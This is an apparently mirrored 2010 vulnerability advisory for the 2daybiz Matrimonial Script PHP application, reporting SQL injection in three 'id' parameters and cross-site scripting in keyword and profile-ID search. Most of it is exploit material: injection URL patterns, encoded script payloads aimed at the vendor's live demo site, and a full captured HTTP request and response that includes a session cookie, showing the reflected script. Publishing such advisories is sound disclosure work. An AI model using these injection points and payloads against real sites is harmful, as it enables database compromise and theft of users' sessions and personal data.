2daybiz Matrimonial Script SQL Injection / Cross Site Scripting

🗓️ 25 Jun 2010 00:00:00Reported by SangteamthamType

packetstorm🔗 packetstormsecurity.com👁 16 Views

2daybiz Matrimonial Script SQL Injection / Cross Site Scripting Vulnerabilities - Hcegroup.ne

`$-------------------------------------------------------------------------------------------------------------------  
$ 2daybiz Matrimonial Script SQL Injection and Cross Site Scripting Vulnerabilities  
$ Author : Sangteamtham   
$ Home : Hcegroup.net   
$ Download : http://www.2daybiz.com/matrimonial_script.html   
$ Date :06/25/2010  
$   
$******************************************************************************************  
$Exploit:  
$  
$ 1.SQL injection:  
$   
$ http://server/customprofile.php?id=[id number][SQL]  
$ http://server/success_story.php?id=[id number][SQL]  
$ http://server/year2005.php?id=[id number][SQL]  
$  
$ 2.XSS  
$ 2.1.keyword search:  
$   
$  
$ http://www.2daybiz.com/products/shaadi/keywordresult.php?lookingfor=&photo=1&maritalstatus=&agefrom=20&ageto=25&heightfrom=&heightto=&community=&mother=&caste=&country=&state1=&city1=&keyword=[XSS here]&Search=Search  
$ Demo:  
$ http://www.2daybiz.com/products/shaadi/keywordresult.php?lookingfor=&photo=1&maritalstatus=&agefrom=20&ageto=25&heightfrom=&heightto=&community=&mother=&caste=&country=&state1=&city1=&keyword=%22%3E%3Cscript%3Ealert%28%22XSS%20Vulnerability%22%29%3C%2Fscript%3E&Search=Search  
$  
$  
$ 2.2.ProfileID search  
Here is my sample header:  
  
$----------------------------------------------------------SAMPLE HEADER---------------------------------------------------------  
http://www.2daybiz.com/products/shaadi/submit_story.php  
  
POST /products/shaadi/submit_story.php HTTP/1.1  
Host: www.2daybiz.com  
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 115  
Connection: keep-alive  
Referer: http://www.2daybiz.com/products/shaadi/submit_story.php  
Cookie: __utma=229131423.947861364.1277393768.1277478668.1277481807.7; __utmz=229131423.1277393768.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none); PHPSESSID=c10e1491d7b9e1d9ed7afc8ce05b7f91; __utmc=229131423; acopendivids=nada; acgroupswithpersist=pets,pets,pets  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 221  
profileid=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2883%2C+97%2C+110%2C+103%2C+116%2C+101%2C+97%2C+109%2C+116%2C+104%2C+97%2C+109%2C+32%2C+119%2C+97%2C+115%2C+32%2C+104%2C+101%2C+114%2C+101%29%29%3C%2Fscript%3E&Go=Go  
HTTP/1.1 302 Moved Temporarily  
Date: Fri, 25 Jun 2010 03:11:50 GMT  
Server: Apache mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635  
X-Powered-By: PHP/5.2.11  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  
Pragma: no-cache  
Location: alert.php?id="><script>alert(String.fromCharCode(83, 97, 110, 103, 116, 101, 97, 109, 116, 104, 97, 109, 32, 119, 97, 115, 32, 104, 101, 114, 101))</script>  
Keep-Alive: timeout=5, max=100  
Connection: Keep-Alive  
Transfer-Encoding: chunked  
Content-Type: text/html  
$-------------------------------------------------------------END HEADER--------------------------------------------------------  
$   
$  
$******************************************************************************************  
$ Greetz to: All Vietnamese hackers and Hackers out there researching for more security  
$   
$  
$--------------------------------------------------------------------------------------------------------------------  
  
`

25 Jun 2010 00:00Current

0.5Low risk

Vulners AI Score0.5